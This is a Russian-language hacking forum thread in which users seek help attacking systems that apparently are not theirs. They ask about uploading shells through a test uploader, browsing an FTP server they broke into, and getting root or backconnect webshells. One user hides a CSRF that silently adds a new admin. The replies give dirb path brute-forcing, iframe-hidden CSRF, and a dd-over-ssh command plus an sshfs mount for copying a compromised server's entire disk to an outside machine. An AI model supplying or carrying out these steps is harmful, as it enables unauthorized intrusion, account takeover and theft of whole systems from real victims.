Loaded Apache modules: core, itk, http_core, mod_so, mod_auth_basic, mod_auth_digest, mod_authn_file, mod_authn_alias, mod_authn_anon, mod_authn_dbm, mod_authn_default, mod_authz_host, mod_authz_user, mod_authz_owner, mod_authz_groupfile, mod_authz_dbm, mod_authz_default, util_ldap, mod_authnz_ldap, mod_include, mod_log_config, mod_logio, mod_env, mod_ext_filter, mod_mime_magic, mod_expires, mod_deflate, mod_headers, mod_usertrack, mod_setenvif, mod_mime, mod_dav, mod_autoindex, mod_info, mod_dav_fs, mod_vhost_alias, mod_negotiation, mod_dir, mod_actions, mod_speling, mod_userdir, mod_alias, mod_substitute, mod_rewrite, mod_proxy, mod_proxy_balancer, mod_proxy_ftp, mod_proxy_http, mod_proxy_ajp, mod_proxy_connect, mod_cache, mod_suexec, mod_disk_cache, mod_cgi, mod_version, mod_php5, mod_apreq2, mod_rpaf, mod_perl

И 2й вопрос, если я успешно получаю рут права как мне сделать шел что б запускался от рута, а не от apacha?

Нашёл на сайте Uploader по ссылке сайт/js/uploadify-2.3/ как-то так,неважно

В заголовке написано Uplodify Test .

При переходе видна лишь кнопка SELECT,заливаю shell пишет что загружено,

Но точно ли он загружает или для виду,это же,типо тест...

А если и загружает то куда,непонятно.Как узнать?

И ещё вопрос я попал на FTP

ftp://***-***-***-**.*****.******.***

Могу всякие файлы читать,но файлов слишком много,аж лагает .

Есть ли какие-нибудь программы для скана директорий FTP?

SaNDER said:
↑ (https://antichat.live/posts/4106791/)
Нашёл на сайте Uploader по ссылке сайт/js/uploadify-2.3/ как-то так,неважно
В заголовке написано Uplodify Test .
При переходе видна лишь кнопка SELECT,заливаю shell пишет что загружено,
Но точно ли он загружает или для виду,это же,типо тест...
А если и загружает то куда,непонятно.Как узнать?
И ещё вопрос я попал на FTP
ftp://***-***-***-**.*****.******.***
Могу всякие файлы читать,но файлов слишком много,аж лагает .
Есть ли какие-нибудь программы для скана директорий FTP?


1) Брутить стандартные пути папки upload, images, avatrs и прочее у можно dirb'у скормить словарь. Второй потыкать форум на предмет FPD(Открытие пути файла), Третий, скачать фреймворк с паблика и посмотреть куда он льет по дефолту.

Изучал атаку xss через svg все показалось просто но почему на том же hackerone такие атаки мение цены чем стандартные xss на томже ютубе ненахожу примеры кражи куков через svg, я что то недопонимаю ?

Говорит ли наличие такой ошибки о sql-inj?


Code:
syntax error, unexpected '@', expecting $end|Gdn_Database|Query|select * from ( select match(d.Name, d.Body) against(:Search0 in boolean mode) as `Relavence`, d.DiscussionID as `PrimaryID`, d.Name as `Title`, d.Body as `Summary`, d.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/', d.DiscussionID) as `Url`, d.DateInserted as `DateInserted`, d.InsertUserID as `UserID`, 'Discussion' as `RecordType` from GDN_Discussion d where match(d.Name, d.Body) against (:Search1 in boolean mode) union all select match(c.Body) against(:Search2 in boolean mode) as `Relavence`, c.CommentID as `PrimaryID`, d.Name as `Title`, c.Body as `Summary`, c.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/comment/', c.CommentID, '/#Comment_', c.CommentID) as `Url`, c.DateInserted as `DateInserted`, c.InsertUserID as `UserID`, 'Comment' as `RecordType` from GDN_Comment c join GDN_Discussion d on d.DiscussionID = c.DiscussionID where match(c.Body) against (:Search3 in boolean mode) ) s order by s.DateInserted desc limit 20

RedFern.89 said:
↑ (https://antichat.live/posts/4108009/)
Говорит ли наличие такой ошибки о sql-inj?

Code:
syntax error, unexpected '@', expecting $end|Gdn_Database|Query|select * from ( select match(d.Name, d.Body) against(:Search0 in boolean mode) as `Relavence`, d.DiscussionID as `PrimaryID`, d.Name as `Title`, d.Body as `Summary`, d.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/', d.DiscussionID) as `Url`, d.DateInserted as `DateInserted`, d.InsertUserID as `UserID`, 'Discussion' as `RecordType` from GDN_Discussion d where match(d.Name, d.Body) against (:Search1 in boolean mode) union all select match(c.Body) against(:Search2 in boolean mode) as `Relavence`, c.CommentID as `PrimaryID`, d.Name as `Title`, c.Body as `Summary`, c.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/comment/', c.CommentID, '/#Comment_', c.CommentID) as `Url`, c.DateInserted as `DateInserted`, c.InsertUserID as `UserID`, 'Comment' as `RecordType` from GDN_Comment c join GDN_Discussion d on d.DiscussionID = c.DiscussionID where match(c.Body) against (:Search3 in boolean mode) ) s order by s.DateInserted desc limit 20



не обязательно.

Как подключиться к InterBase?

Логин и пароль знаю,а как подключиться нет .

IBConsole запустил и понять в ней ничего не могу.Версия новая .

Подскажите webshell для windows с backconnect'ом в комплекте

PS на сервере php,node

или отдельно backconnect с примером его запуска

Делаю POST CSRF


Code:


Все срабатывает отлично но после атаки админа редиректит в /users/ и он спалит нового админа так вот как поменять и этот редирект?

Редирект ты вряд ли сможешь упразднить, но оно и не нужно. CSRF обычно в ифрейм прячется, примерно так будет выглядеть:


PHP:


CSRF

Имеется root на сервере

.SpoilerTarget" type="button">Spoiler: info server


Code:
root@server:# uname -a
Linux server 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

root@server:# df -h
Filesystem Size Used Avail Use% Mounted on
udev 490M 0 490M 0% /dev
tmpfs 100M 11M 89M 11% /run
/dev/vda1 30G 18G 12G 60% /
tmpfs 497M 0 497M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 497M 0 497M 0% /sys/fs/cgroup
tmpfs 100M 0 100M 0% /run/user/0

root@server:# lsblk -a
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
vda 253:0 0 30G 0 disk
└─vda1 253:1 0 30G 0 part /
loop0 7:0 0 0 loop
loop1 7:1 0 0 loop
loop2 7:2 0 0 loop
loop3 7:3 0 0 loop
loop4 7:4 0 0 loop
loop5 7:5 0 0 loop
loop6 7:6 0 0 loop
loop7 7:7 0 0 loop


Подскажите как имея ssh сделать образ/backup удаленной машины (то есть всей системы/hdd)?

И скачать налету упакованный образ/архив (при условии если места не хватит)

В последствии поднять данный образ в VM

Как вариант, сделать образ диска, с сохранением на удалённую машину, через SSH:


Code:
dd if=/dev/vda | ssh root@yourserver.com -p22 "cat > vda_image"

А потом гуглить "dd image to vm" и пробовать заводить этот образ

crlf said:
↑ (https://antichat.live/posts/4115173/)
Как вариант, сделать образ диска, с сохранением на удалённую машину, через SSH:

Code:
dd if=/dev/vda | ssh root@yourserver.com -p22 "cat > vda_image"

А потом гуглить "
dd image to vm
" и пробовать заводить этот образ


Ранее с таким не сталкивался, потому вопрос может быть очень глупым

)))

Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)

"cat > vda_image"я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh root@xxx.xxx.xxx.xx (mailto:root@xxx.xxx.xxx.xx) -p22 "cat > /root/folder_on_my_computer/vda_image_file"

Я верно понял?

P.S> как узнать предположительный размер конечного файла?

Дабы решить на какую удаленную лить (место не резиновое =) )

kacergei said:
↑ (https://antichat.live/posts/4115204/)
Ранее с таким не сталкивался, потому вопрос может быть очень глупым
)))
Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)
"cat > vda_image"
я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh
root@xxx.xxx.xxx.xx (mailto:root@xxx.xxx.xxx.xx)
-p22 "cat > /root/folder_on_my_computer/vda_image_file"
Я верно понял?
P.S> как узнать предположительный размер конечного файла?
Дабы решить на какую удаленную лить (место не резиновое =) )


смонтируй директорию(хоть корень) через sshfs


Code:
sshfs user@hostname:/remote/path /sshfs_local_folder

и работай как с локальной системой, tar там или ещё чего, создать iso можно так


Code:
mkisofs -lJR -o output_image.iso sshfs_local_folder

по идее должно работать